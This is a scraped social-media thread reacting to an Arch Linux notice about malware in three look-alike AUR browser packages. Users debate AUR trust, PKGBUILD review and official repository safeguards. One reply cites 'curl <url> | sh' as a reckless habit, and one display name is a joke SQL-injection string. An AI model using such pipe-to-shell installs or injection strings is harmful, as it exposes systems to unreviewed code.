Arch Linux 
[aur-general] - [SECURITY] firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin AUR packages contained malware
Arc<dyn fnrir> 
'; DO A FLIP; --@archlinux Is there a backup of those? I wanna take a peek at the PKGBUILD
raspbeguy@fnrir @archlinux these are *-bin packages so I guess the PKGBUILDs probably won't seem suspicious, because the binaries are built before the package creation.
Lucy@raspbeguy @fnrir @archlinux > These packages were installing a script [...]
Looks like something in the PKGBUILD itself to me
rick[4667]@WHY2025@archlinux few, for a sec i thought it was the 'original' packages. But nope they sound the same with additional 'fix' and 'patch' in the name. But still thanks for the info!
CyberFrog@archlinux nice, isn't it cool how every arch user I've ever met thinks it's totally fine to run arbitrary binaries from strangers, with absolutely no concept of what project packaging is and what official maintainers do
Christian Heusel> DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.
Reckless people will do reckless things, users are advised to audit PKGBUILDs and all changes to them.
@gromit @archlinux yeah, but everyone totally ignores or plays down the warnings, there is a culture of blindly trusting the AUR among arch users usually
I'm a long time contributor to a large Linux community online, and often one of the first things users do on a clean install is setup an AUR helper and blindly pull packages they want
I'm a long time contributor to a large Linux community online, and often one of the first things users do on a clean install is setup an AUR helper and blindly pull packages they want
@froge @archlinux Well yes, but from our side users are advised not to use an AUR helper until they know what they're doing ..
But if people continue to ignore advice and good practises and also keep installing stuff with "curl <url> | sh" you maybe just can't help them :D
@gromit @froge @archlinux Love how literally half the time I see an oficial arch post/talk it contains "Don't trust the AUR and don't/only very carefully use helpers", I'm always agreeing and reinforcing that, yet I run a script to automatically compile over 100 AUR packages inside a docker container where the build user has root access without a password lol
�@gromit @froge @archlinux is their an explanation for dumb people like me, why it is more unlikely that something like that will happen in the official packages or even in the debian repository. like a package maintainer goes rogue?
@utf_7 @gromit @archlinux the official repos are managed by trusted maintainers and have a review and quality assurance process which is likely to catch any malicious or incorrect changes
the AUR is simply a list of packages maintained by random people who have free reign to update them whenever they want, with anything they want, without review or checks
using the AUR is a bit like going and installing a random binary from a random github project, without anyone checking the code at all, the official repos have a lot of peer review by people with good reputations in the arch community
the AUR is simply a list of packages maintained by random people who have free reign to update them whenever they want, with anything they want, without review or checks
using the AUR is a bit like going and installing a random binary from a random github project, without anyone checking the code at all, the official repos have a lot of peer review by people with good reputations in the arch community
Nekko@utf_7 Is it possible? Sure. But then the maintainers credentials are compromised or the maintainer is malicious. For both of them you can remove the maintainer from the project and they generally aren't considered trustworthy anymore if done maliciously.
Since distro packages are signed the provided build/binary and its build script is "vouched for" (to some degree) by the maintainer that signed the package.
_L4NyrlfL1I0@archlinux is there an archive of the PKGBUILD and distributed binary files of the packages so that post-mortem analysis of the attack can be done?
I assume all public downloads of the affected packages have been removed so that people don't install the malware by accident.
BacteriaWould be interesting to know on how these were discovered. Also, is their a semi-official review process that is done on the AUR packages?
@bacteriostat @archlinux In an ideal world, every user would follow the instructions and skim through every PKGBUILD - essentially just a script - they execute. And ofc flag it when they see something malicious. So the users themselves are the reviewers.
Just thinking out lound but can't we have a more interesting system to improve the security of AUR?
My suggestions:
1) Arch Packagers can appoint AUR maintainers who are trusted to benign. Maybe by number packages or votes on packages.
2) Every new AUR package should require to be approved by an AUR maintainer irrespective of the age of account.
m_on_stair
squalouJenkins@bacteriostat @archlinux the whole point of AUR is *not* having this, as compared to official repos.
Richardus@archlinux Why would you use a firefox AUR packadge. when if you use KDE you can download it from flatpak ? Am anyway sceptic with AUR packadges.
Or is flatpack just as bad as AUR ?
@m @archlinux
Then you use something else. Gnome or some other DE.
At least i expect lots of people use a DE on linux. Also, but not tried. you can run flatpak from a command line as far i know.
@1024Bytes @archlinux what's the link between KDE and flatpak ?
@squalouJenkins @archlinux Discover uses flatpak. But flatpak is used on many other linux distro's to. But it's what i found on KDE
Small mistake in my mind.
Trace@1024Bytes @archlinux The Firefox flatpak is maintained by Mozilla and verified on flathub but not all flatpaks are maintained by the upstream developer.
@1024Bytes @archlinux 1. I don't want another package management system
2. I don't want containerization, neither on my Laptop/PC nor on my servers (yes, I also dislike docker, specifically docker)
3. I know makepkg pretty well, flatpak etc. not at all. I can easily read, customize and create PKGBUILDs, but not flatpaks
2. I don't want containerization, neither on my Laptop/PC nor on my servers (yes, I also dislike docker, specifically docker)
3. I know makepkg pretty well, flatpak etc. not at all. I can easily read, customize and create PKGBUILDs, but not flatpaks
@archlinux I need to correct myself. You not need flatpak for firefox. It's just in the pacman available.
theoretical lesbianism@archlinux aur moment
Dagda [Homophobic Arc]@archlinux AUR moment